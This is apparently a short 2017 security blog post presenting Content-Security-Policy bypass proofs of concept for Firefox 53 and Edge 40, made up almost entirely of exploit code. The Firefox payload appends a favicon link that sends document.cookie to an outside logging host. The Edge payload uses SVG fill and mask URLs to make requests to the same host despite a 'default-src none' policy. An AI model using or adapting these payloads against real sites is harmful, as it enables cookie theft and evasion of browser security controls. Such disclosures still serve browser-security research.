Firefox53 & Edge40 Browsers CSP Bypass

10 May 2017 - evi1m0

Firefox 53.0.2 Version

CSP RULE:

header("Content-Security-Policy: default-src 'none' 'unsafe-inline';");

Bypass:

x = (new Date()).valueOf();
document.cookie = "csp=" + escape("SECUREKEY@^#2!@#") + ";";
	
ffn0t= document.head.appendChild(document.createElement("link"));
ffn0t.rel = "shortcut icon";
ffn0t.href = "http://" + x + ".shortcuticon.ff.vqn3j8.ceye.io/?" + document.cookie;

Microsoft Edge 40.15063 Version

CSP RULE:

header("Content-Security-Policy: default-src 'none' 'unsafe-inline';");

Bypass:

<script>
(function(){
    var x = document.body.appendChild(document.createElement("svg"));
    x.setAttribute("id", "n0tr00t");
    x.setAttribute("xmlns", "http://www.w3.org/2000/svg");

    /* fill & mask */
    var svgNS = "http://www.w3.org/2000/svg";
    var n0tr00t = document.getElementById('n0tr00t');
    var fillurl = "url(http://csp32test2.edge.vqn3j8.ceye.io/fillbypass)";
    var maskurl = "url(http://csp32test2.edge.vqn3j8.ceye.io/maskbypass)";
    var nodeRect = n0tr00t.appendChild(document.createElementNS(svgNS, "rect"));
    nodeRect.setAttribute("height", 200);
    nodeRect.setAttribute("width", 200);
    nodeRect.setAttribute("fill", fillurl);
    nodeRect.setAttribute("stroke","#000000");
    var nodeRect2 = n0tr00t.appendChild(document.createElementNS(svgNS, "rect"));
    nodeRect2.setAttribute("height", 200);
    nodeRect2.setAttribute("width", 200);
    nodeRect2.setAttribute("fill", "green");
    nodeRect2.setAttribute("mask", maskurl);
    nodeRect2.setAttribute("stroke","#000000");
})()
</script>
评论插件使用 Disqus ,需翻墙才能查看及留言。